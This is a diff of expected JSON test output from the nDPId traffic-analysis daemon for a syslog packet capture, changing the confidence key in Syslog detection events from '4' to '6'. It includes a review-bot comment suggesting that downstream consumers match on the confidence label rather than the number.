@@ -6,27 +6,27 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":3,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":3,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":6,"global_ts_msec":1377043331844} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1377043331844,"flow_last_seen":1377043331844,"flow_idle_time":200000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1377043331844,"l3_proto":"ip4","src_ip":"172.20.51.54","dst_ip":"172.31.110.40","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1377043331844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1377043331844,"pkt":"vDBb56YVAASWJ4vKCABFAACoJ0cAADwRXWysFDM2rB9uKAICAgIAlCzbPDEzND44NTQgMDgvMjAvMjAxMy0xOTowNToyMyBDT05GSUcgUUxBMjNYWCBQQ0lERVYwMyBEaXNjTG9vcElkIHFsYTIzeHhTdE1hY2hSdW4uY3h4IDM1MTAKMCBMb2NhbCBQb3J0IENvbm5lY3Rpb24gVHlwZT0gTE9PUDogbG9vcElkPTB4N0QKCgA="} 
-00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1377043331844,"flow_last_seen":1377043331844,"flow_idle_time":200000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1377043331844,"l3_proto":"ip4","src_ip":"172.20.51.54","dst_ip":"172.31.110.40","src_port":514,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1377043331844,"flow_last_seen":1377043331844,"flow_idle_time":200000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1377043331844,"l3_proto":"ip4","src_ip":"172.20.51.54","dst_ip":"172.31.110.40","src_port":514,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1377043331884,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1377043331884,"pkt":"vDBb56YVAASWJ4vKCABFAAChJ0gAADwRXXKsFDM2rB9uKAICAgIAjZRnPDEzND44NTQgMDgvMjAvMjAxMy0xOTowNToyMyBDT05GSUcgRkNQVCBCdWlsZExvb3BNYXAgZmNwVHJhbnNwb3J0TG9jYWxQb3J0LmNwcCAxOTg5CjAgTG9vcE1hcDogMDE5ZDlmOWU5YjhmOTg5MDk3YWJhYWE5YWNhNWE3YTZhMwoKAA=="} 
00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1377043331893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1377043331893,"pkt":"vDBb56YVAASWJ4vKCABFAADcJ0kAADwRXTasFDM2rB9uKAICAgIAyJYPPDEzND44NTQgMDgvMjAvMjAxMy0xOTowNToyMyBDT05GSUcgRkNQVCBHZW5lcmF0ZUV2ZW50IGZjcFRyYW5zcG9ydExvY2FsUG9ydC5jcHAgMTIxOAowIEZDUCBMb2NhbCBQb3J0IFN0YXRlIFVQICA6IFdXTj0weDUwMDBEMzEwMDAwMzU2MDYgcG9ydElkPTB4MDAwMDAxIHBvcnRSb2xlPUJvdGggTG9jYWxQb3J0SW5kZXg9MHgwMDAzCgoA"} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":18,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":2295,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":1388653792914} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1388653792914,"flow_last_seen":1388653792914,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1388653792914,"l3_proto":"ip4","src_ip":"10.251.23.139","dst_ip":"62.39.3.142","src_port":59194,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1388653792914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1388653792914,"pkt":"gPsG8EXX4KHXGMJyCABFtABoYZ9AAEARc\/cK+xeLPicDjuc6AgIAVGhaPDE0Nz5KYW4gIDIgMTA6MDk6NTIgbmI2IGNoaWxsaXNwb3RbNDIyMl06IEM6MTkyLjE2OC4yLjgzLzAwOjE5OjdEOjNCOjZGOkQ0Cg=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1388653792914,"flow_last_seen":1388653792914,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1388653792914,"l3_proto":"ip4","src_ip":"10.251.23.139","dst_ip":"62.39.3.142","src_port":59194,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1377043331844,"flow_last_seen":1377043354299,"flow_idle_time":200000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":2295,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1388653792914,"l3_proto":"ip4","src_ip":"172.20.51.54","dst_ip":"172.31.110.40","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1388653792914,"flow_last_seen":1388653792914,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1388653792914,"l3_proto":"ip4","src_ip":"10.251.23.139","dst_ip":"62.39.3.142","src_port":59194,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1377043331844,"flow_last_seen":1377043354299,"flow_idle_time":200000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":2295,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1388653792914,"l3_proto":"ip4","src_ip":"172.20.51.54","dst_ip":"172.31.110.40","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1388653841215,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1388653841215,"pkt":"gPsG8EXX4KHXGMJyCABFtABoYaBAAEARc\/YK+xeLPicDjuc6AgIAVHJZPDE0Nz5KYW4gIDIgMTA6MTA6NDEgbmI2IGNoaWxsaXNwb3RbNDIyMl06IEQ6MTkyLjE2OC4yLjgzLzAwOjE5OjdEOjNCOjZGOkQ0Cg=="} 
00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":17,"total-skipped-flows":0,"total-l4-payload-len":2447,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1488571038380} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571038380,"flow_last_seen":1488571038380,"flow_idle_time":200000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1488571038380,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1488571038380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":161,"pkt_l4_len":123,"thread_ts_msec":1488571038380,"pkt":"AAAMn\/B5ACEbrjHBgQAAeQgARQAAjwBGAAD\/EUiywKh5CsCoeArDoAICAHsygDwxODk+NzI6IE1hciAgMyAxOTo1NzoxNy4zNzE6ICVMSU5LLTUtQ0hBTkdFRDogSW50ZXJmYWNlIEdpZ2FiaXRFdGhlcm5ldDAvMiwgY2hhbmdlZCBzdGF0ZSB0byBhZG1pbmlzdHJhdGl2ZWx5IGRvd24="} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571038380,"flow_last_seen":1488571038380,"flow_idle_time":200000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1488571038380,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571038380,"flow_last_seen":1488571038380,"flow_idle_time":200000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1488571038380,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1488571038381,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":165,"pkt_l4_len":127,"thread_ts_msec":1488571038381,"pkt":"AAAMn\/B5ACEbrjHBgQAAeQgARQAAkwBHAAD\/EUitwKh5CsCoeArDoAICAH\/o6TwxODk+NzM6IE1hciAgMyAxOTo1NzoxOC4zNzc6ICVMSU5FUFJPVE8tNS1VUERPV046IExpbmUgcHJvdG9jb2wgb24gSW50ZXJmYWNlIEdpZ2FiaXRFdGhlcm5ldDAvMiwgY2hhbmdlZCBzdGF0ZSB0byBkb3du"} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":22,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1388653792914,"flow_last_seen":1388653841215,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1488571038381,"l3_proto":"ip4","src_ip":"10.251.23.139","dst_ip":"62.39.3.142","src_port":59194,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":22,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1388653792914,"flow_last_seen":1388653841215,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1488571038381,"l3_proto":"ip4","src_ip":"10.251.23.139","dst_ip":"62.39.3.142","src_port":59194,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1488571187162,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":141,"pkt_l4_len":103,"thread_ts_msec":1488571187162,"pkt":"AAAMn\/B5ACEbrjHBgQAAeQgARQAAewBIAAD\/EUjEwKh5CsCoeArDoAICAGcZkzwxODc+NzQ6IE1hciAgMyAxOTo1OTo0Ni4xNTI6ICVMSU5LLTMtVVBET1dOOiBJbnRlcmZhY2UgR2lnYWJpdEV0aGVybmV0MC8yLCBjaGFuZ2VkIHN0YXRlIHRvIHVw"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571330521,"flow_last_seen":1488571330521,"flow_idle_time":200000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1488571330521,"l3_proto":"ip4","src_ip":"192.168.121.2","dst_ip":"192.168.120.10","src_port":50352,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1488571330521,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":184,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":184,"pkt_l4_len":146,"thread_ts_msec":1488571330521,"pkt":"ABpsoSuZAB56eT8RgQAAeQgARQAApgA+AAD\/EUirwKh5AsCoeArEsAICAJJuQTwxOTA+NjM6IE1hciAgMyAyMDowMjowOS40NjQ6ICVJUFY2X0FDTC02LUFDQ0VTU0xPR1A6IGxpc3QgdnR5LWFjY2Vzcy8xMCBwZXJtaXR0ZWQgdGNwIDIwMDM6NTE6NjAxMjoxMTA6OkIxNToyMig2MDg5MikgLT4gOjooMjIpLCAxIHBhY2tldA=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571330521,"flow_last_seen":1488571330521,"flow_idle_time":200000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1488571330521,"l3_proto":"ip4","src_ip":"192.168.121.2","dst_ip":"192.168.120.10","src_port":50352,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571330521,"flow_last_seen":1488571330521,"flow_idle_time":200000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1488571330521,"l3_proto":"ip4","src_ip":"192.168.121.2","dst_ip":"192.168.120.10","src_port":50352,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1488571330522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":201,"pkt_l4_len":163,"thread_ts_msec":1488571330522,"pkt":"ABpsoSuZAB56eT8RgQAAeQgARQAAtwA\/AAD\/EUiZwKh5AsCoeArEsAICAKOtbzwxOTA+NjQ6IE1hciAgMyAyMDowMjowOS40Njg6ICVJUFY2X0FDTC02LUFDQ0VTU0xPR1A6IGxpc3QgdnR5LWFjY2Vzcy8xMCBwZXJtaXR0ZWQgdGNwIDIwMDM6NTE6NjAxMjoxMTA6OkIxNToyMig2MDg5MikgLT4gMjAwMzo1MTo2MDEyOjEyMTo6MigyMiksIDEgcGFja2V0"} -00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":26,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1488571038380,"flow_last_seen":1488571189276,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1488571330522,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":26,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1488571038380,"flow_last_seen":1488571189276,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1488571330522,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":26,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":23,"total-skipped-flows":0,"total-l4-payload-len":3186,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":1,"current-active-flows":2,"total-active-flows":4,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":30,"global_ts_msec":1557406267494} 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"syslog.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1557406267494,"flow_last_seen":1557406267494,"flow_idle_time":620000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1557406267494,"l3_proto":"ip4","src_ip":"193.24.227.10","dst_ip":"216.66.86.114","l4_proto":41,"flow_datalink":1,"flow_max_packets":3} 
01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"syslog.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1557406267494,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":480,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":480,"pkt_l4_len":446,"thread_ts_msec":1557406267494,"pkt":"ABDb\/xAAACFZH\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"} 
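Review bot: The numeric key under `ndpi.confidence` changes from `"4"` to `"6"` while the label stays `"DPI"` in every Syslog `detected`, `idle` and `update` event of this hunk, and the same change appears in the `@@ -34,14` and `@@ -49,61` hunks, so the number is evidently not stable across libnDPI bumps. A downstream consumer or detection rule that matches on the numeric key rather than the label would presumably misread the confidence level after this update. The commit description should say that the confidence numbering shifted and that consumers should key on the string value, e.g. `confidence ids are renumbered by this libnDPI bump; match on the label ("DPI", "Match by port"), not the number`. If the project ships a schema or example consumers for flow events, check that none of them pins the old numbering; that cannot be seen from these hunks.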
@@ -34,14 +34,14 @@ 01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"syslog.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1557406267510,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":480,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":480,"pkt_l4_len":446,"thread_ts_msec":1557406267510,"pkt":"ABRpnhFAABDb\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"} 01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"syslog.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1557406275495,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":480,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":480,"pkt_l4_len":446,"thread_ts_msec":1557406275495,"pkt":"ABDb\/xAAACFZH\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"} 01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"syslog.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1557406275511,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":480,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":480,"pkt_l4_len":446,"thread_ts_msec":1557406275511,"pkt":"ABRpnhFAABDb\/xAACABFAAHSru1AAPspAo\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"} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1488571330521,"flow_last_seen":1488571330522,"flow_idle_time":200000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1557406275511,"l3_proto":"ip4","src_ip":"192.168.121.2","dst_ip":"192.168.120.10","src_port":50352,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1488571038380,"flow_last_seen":1488571189276,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1557406275511,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1488571330521,"flow_last_seen":1488571330522,"flow_idle_time":200000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1557406275511,"l3_proto":"ip4","src_ip":"192.168.121.2","dst_ip":"192.168.120.10","src_port":50352,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1488571038380,"flow_last_seen":1488571189276,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1557406275511,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"syslog.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1557406279481,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":537,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":537,"pkt_l4_len":503,"thread_ts_msec":1557406279481,"pkt":"ABDb\/xAAACFZH\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"} 01095{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"syslog.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1557406279497,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":537,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":537,"pkt_l4_len":503,"thread_ts_msec":1557406279497,"pkt":"ABRpnhFAABDb\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"} 
